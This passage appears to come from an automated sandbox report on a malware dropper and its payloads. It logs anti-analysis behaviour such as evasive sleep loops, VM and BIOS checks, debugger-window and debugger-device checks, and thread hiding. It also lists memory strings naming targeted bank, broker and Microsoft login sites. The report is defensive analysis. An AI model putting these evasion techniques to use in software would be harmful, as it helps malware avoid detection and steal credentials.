May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 432 Thread sleep time: -54027s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4308 Thread sleep time: -42021s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6668 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5524 Thread sleep time: -54027s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3176 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3176 Thread sleep time: -68034s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6004 Thread sleep time: -54027s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1440 Thread sleep time: -56028s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7124 Thread sleep time: -58029s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8120 Thread sleep count: 73 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8120 Thread sleep time: -146073s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8104 Thread sleep count: 73 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8104 Thread sleep time: -146073s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7308 Thread sleep count: 281 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7308 Thread sleep time: -8430000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6620 Thread sleep count: 66 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6620 Thread sleep time: -132066s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8112 Thread sleep count: 73 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8112 Thread sleep time: -146073s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8100 Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8100 Thread sleep time: -136068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7536 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8116 Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8116 Thread sleep time: -128064s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6620 Thread sleep count: 592 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6620 Thread sleep time: -1184592s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7308 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7312 Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7372 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 77 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 76 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 189 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 176 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 176 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 126 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 78 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7696 Thread sleep count: 118 > 30
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 1632 Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 8020 Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 7676 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe TID: 892 Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe TID: 7668 Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe TID: 5780 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe TID: 7784 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe TID: 7656 Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe TID: 7412 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe TID: 5908 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe TID: 4332 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Last function: Thread delayed
Source: C:\Users\user\Documents\JKECGDBFCB.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4EC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C4EC930
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: skotes.exe, skotes.exe, 00000010.00000002.2657266202.0000000000F29000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000011.00000002.3321935060.0000000000F29000.00000040.00000001.01000000.0000000E.sdmp, 2533b4b8c7.exe, 00000012.00000002.3320129822.00000000009AE000.00000040.00000001.01000000.0000000F.sdmp, feb3d39b6a.exe, 00000013.00000002.3345447491.0000000005EBB000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3346402660.000000000617A000.00000040.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3320178921.00000000005B8000.00000040.00000001.01000000.00000010.sdmp, 815f2a8fe8.exe, 00000014.00000002.3070485860.0000000000F8D000.00000040.00000001.01000000.00000011.sdmp, feb3d39b6a.exe, 00000016.00000002.3319917877.00000000005B8000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 815f2a8fe8.exe, 00000014.00000002.3062536575.0000000000835000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPP
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: firefox.exe, 00000023.00000002.3238991466.00000132AC460000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW:6x.
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: feb3d39b6a.exe, 00000016.00000003.3171403856.00000000056B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: feb3d39b6a.exe, 00000016.00000002.3342025248.0000000005679000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3233382909.000000000567D000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3241071191.000000000567D000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3286619408.0000000005679000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3310416758.0000000005679000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3287512405.000000000567A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ym32rGu9qOBxJlidaNEL07G91Wp5WWQ9jOEqemUc%2FYHvy1e2BwWKsxzDC2g6y70OQ500grZ7Maxdm11AEfEXNaTaNyKtaX9jPGkxN5QKCDD5VwG%2BaloOPYpikudO7JJW3LkiA9U%3D"}],"group":"cf-nel","max_age":604800}
Source: feb3d39b6a.exe, 00000016.00000002.3324968173.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWr
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2604363979.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000011.00000002.3331222029.0000000001628000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000011.00000002.3331222029.0000000001658000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000002.3325397739.0000000001008000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000002.3342180435.00000000056A0000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3327603670.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3327603670.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 815f2a8fe8.exe, 00000014.00000002.3062536575.000000000085F000.00000004.00000020.00020000.00000000.sdmp, 0d957dbf73.exe, 00000015.00000003.3137310167.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: feb3d39b6a.exe, 00000016.00000003.3234413753.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3233162517.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ym32rGu9qOBxJlidaNEL07G91Wp5WWQ9jOEqemUc%2FYHvy1e2BwWKsxzDC2g6y70OQ500grZ7Maxdm11AEfEXNaTaNyKtaX9jPGkxN5QKCDD5VwG%2BaloOPYpikudO7JJW3LkiA9U%3D"}],"group":"cf-nel","max_age":604800}
Source: 0d957dbf73.exe, 00000015.00000003.3169954332.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, 0d957dbf73.exe, 00000015.00000003.3179111562.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, 0d957dbf73.exe, 00000015.00000003.3160561525.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, 0d957dbf73.exe, 00000015.00000002.3186445759.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW,
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 0d957dbf73.exe, 00000015.00000003.3046557532.0000000000B02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2604363979.0000000000F44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWxL
Source: feb3d39b6a.exe, 00000016.00000003.3171403856.00000000056B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: 815f2a8fe8.exe, 00000014.00000002.3062536575.00000000007EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000002.2604363979.0000000000F72000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2594058159.00000000005BD000.00000040.00000001.01000000.00000003.sdmp, JKECGDBFCB.exe, 0000000E.00000002.2625269911.0000000000709000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000F.00000002.2650483415.0000000000F29000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000010.00000002.2657266202.0000000000F29000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000011.00000002.3321935060.0000000000F29000.00000040.00000001.01000000.0000000E.sdmp, 2533b4b8c7.exe, 00000012.00000002.3320129822.00000000009AE000.00000040.00000001.01000000.0000000F.sdmp, feb3d39b6a.exe, 00000013.00000002.3345447491.0000000005EBB000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3346402660.000000000617A000.00000040.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3320178921.00000000005B8000.00000040.00000001.01000000.00000010.sdmp, 815f2a8fe8.exe, 00000014.00000002.3070485860.0000000000F8D000.00000040.00000001.01000000.00000011.sdmp, feb3d39b6a.exe, 00000016.00000002.3319917877.00000000005B8000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: feb3d39b6a.exe, 00000016.00000003.3234413753.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3233162517.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: server-timingcfL4;desc="?proto=TCP&rtt=1576&min_rtt=1568&rtt_var=605&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21474&delivery_rate=1784841&cwnd=195&unsent_bytes=0&cid=7873240d477e5de5&ts=791&x=0"alt-svch3=":443"; ma=86400CF-RAY8ef997bf7e8542f5-EWRNEL{"success_fraction":0,"report_to":"cf-nel","max_age":604800}Report-To{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ym32rGu9qOBxJlidaNEL07G91Wp5WWQ9jOEqemUc%2FYHvy1e2BwWKsxzDC2g6y70OQ500grZ7Maxdm11AEfEXNaTaNyKtaX9jPGkxN5QKCDD5VwG%2BaloOPYpikudO7JJW3LkiA9U%3D"}],"group":"cf-nel","max_age":604800}CF-Cache-StatusDYNAMICPersistent-AuthWWW-AuthenticateVaryPHPSESSID=sbsmhq95q5dl2bledkjvs703c0; expires=Fri, 04-Apr-2025 19:38:36 GMT; Max-Age=9999999; path=/Set-CookiecloudflareServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedThu, 19 Nov 1981 08:52:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveTue, 10 Dec 2024 01:51:57 GMTDateProxy-ConnectioncloseConnectionno-store, no-cache, must-revalidateCache-Control
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: feb3d39b6a.exe, 00000016.00000003.3172990683.00000000056A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_04D904A2 Start: 04D9051D End: 04D90490 14_2_04D904A2
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Process queried: DebugPort
